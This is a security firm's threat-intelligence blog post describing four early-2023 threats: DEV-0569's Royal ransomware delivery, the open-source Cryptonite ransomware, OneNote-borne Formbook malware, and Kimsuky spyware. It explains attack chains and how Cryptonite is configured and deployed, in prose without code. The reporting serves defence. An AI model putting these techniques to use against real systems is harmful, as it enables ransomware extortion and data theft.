January 26, 2023

Four Cybersecurity Threats Affecting Businesses in January 2023

Four Cybersecurity Threats Affecting Businesses in January 2023 Cybersecurity & Digital Forensics

Cybersecurity threats are increasing rapidly. Threat groups introduced new ways to proliferate ransomware at the end of 2022 into the new year, including trojanized OneNote documents and new toolkit infrastructures. As a result, companies need to be more aware of potential deficiencies in their overall cybersecurity strategy. Threat hunt queries, offered as part of Marcum Technology’s Security Operations Center (SOC) services, are key to identifying potential threats in an organization’s environment.

Below are the top four threats that emerged over the past month.

DEV-0569 Develops New Ways to Deliver Royal Ransomware

Microsoft is tracking DEV-0569, a malicious group that began deploying the Royal Ransomware in September 2022. Notably, in addition to spam emails, the group’s delivery strategy relies on blending into areas well outside of the work inbox. It’s now infiltrating contact forms on company websites, inserting installer files on legitimate sites, and even leveraging Google Ads for “malvertising.” Signed binaries with encrypted malware payloads are a hallmark of the group’s activity. It also leverages Nsudo in attempts to disable antivirus software.

While the group does plenty of its own delivery, it sometimes relies on phishing as a service, which is offered by threat organizations. DEV-0569 also uses virtual hard disk (VHD) files, a disk image format for storing the entirety of a drive’s contents. In a recent attack campaign, contact forms were leveraged for their ability to bypass email protections and thus appear trustworthy. The group used the target company’s contact forms, posing as a financial authority. When a response was received, the group replied with a message containing a link to BATLOADER, hosted on GitHub, OneDrive, or other abused services.

These installers launch a PS script that, among other things, downloads a NirCMD CL utility from NirSoft. This allows the attacker to elevate from local admin to SYSTEM, if it is successful. From there, additional executables are delivered, including the Gozi banking trojan (encrypted) and Vidar Stealer, which uses telegram for C2. This is a change from Zloader, which DEV-0569 stopped using in early 2022. The group has recently used BATLOADER, a downloader malware, to deploy Royal ransomware. Unlike ZLoader, BATLOADER can execute PS scripts in addition to commands, and it uses gpg4win to decrypt payloads.

Cryptonite Ransomware

This iteration of Cryptonite (not the Chaos ransomware version with the same name) is coded in Python, considered free and open-source software (FOSS), and available to anyone who can download and deploy it. All a malicious actor needs to do is configure the software (which is as easy as running the exeGen Python script) and define things such as a Bitcoin wallet address, a contact email address to obtain a decryption key, and which directories not to encrypt. This is all done through a GUI so there is no source code editing and recompiling. The malicious actor also needs a server configured to accept input from the victim’s device; the server must be a basic Python web server attached to an SQL lite database.

Cryptonite is deployed with PyInstaller, which adds its files to a randomly named folder on the victim’s computer. This ensures the victim will run the malware. It then searches for an active network connection and throws up an error if there is not one. After a connection is established, it begins encrypting the device with Fernet 128-bit AES encryption and adding “.cryptn8” to the file names. Once it is done, it passes the victim’s information to the server and displays a ransom window with details on how to get the key to unlock the system.

Trojanized OneNote Document

Researchers recently uncovered threat actors using a OneNote document to move Formbook malware, an information-stealing trojan sold on an underground hacking forum since mid-2016, as malware as a service. Formbook can steal data from various web browsers and other applications. This malware also has keylogging functionality and can take screenshots. One file type, observed on December 6, 2022, was a OneNote attachment with a .one extension file attached to a spam email. Once the OneNote attachment is opened, an image lure is displayed with the words ‘View Document’ on the image. Clicking ‘View Document’ executes the WSF file and triggers a warning prompt stating that a file is being opened from the OneNote application. When the user goes against the warning and clicks ‘OK,’ the malicious behavior of the file starts to manifest. The WSF embedded in the OneNote file launches ‘PowerShell’ commands to download and execute two files. The first file is a decoy OneNote file. The decoy file is launched first to hide the download of the second file, which contains the payload. The second file is an executable — the Formbook malware.

Kimsuky Threat Group

The Cybereason Nocturnus Team has discovered a new toolkit infrastructure used by the Kimsuky gang, an infamous activity organization that has acted on behalf of the North Korean regime since 2012. After a thorough assessment of the new infrastructure, along with pattern analysis, the team identified the KGH Spyware Suite, a modular virus likely implicated in recent espionage activities, and the CSPY downloader, both previously unknown.

The US-CERT published a report that summarized Kimsuky’s recent activities and described the group’s TTPs and infrastructure. There were some intriguing parallels between the earlier Kimsuky malware and servers and the newly identified malware and infrastructure. Additionally, there were significant behavioral and coding similarities between the new malware variants and previously identified Kimsuky malware and TTPs. It is clear the threat actors tried to stay under the radar by adopting different anti-forensics and anti-analysis measures. These include backdating the malware samples’ creation/compilation time to 2016, code obfuscation, anti-VM, and anti-debugging techniques. CISA and the FBI advised individuals and organizations within this target profile to strengthen their defenses and adopt a heightened state of awareness. Particularly important mitigations include multi-factor authentication, user awareness training, and safeguards against spear phishing.

Interested in learning more about identifying potential threats to your organization and how Marcum Technology can help? View all of our cybersecurity offerings here.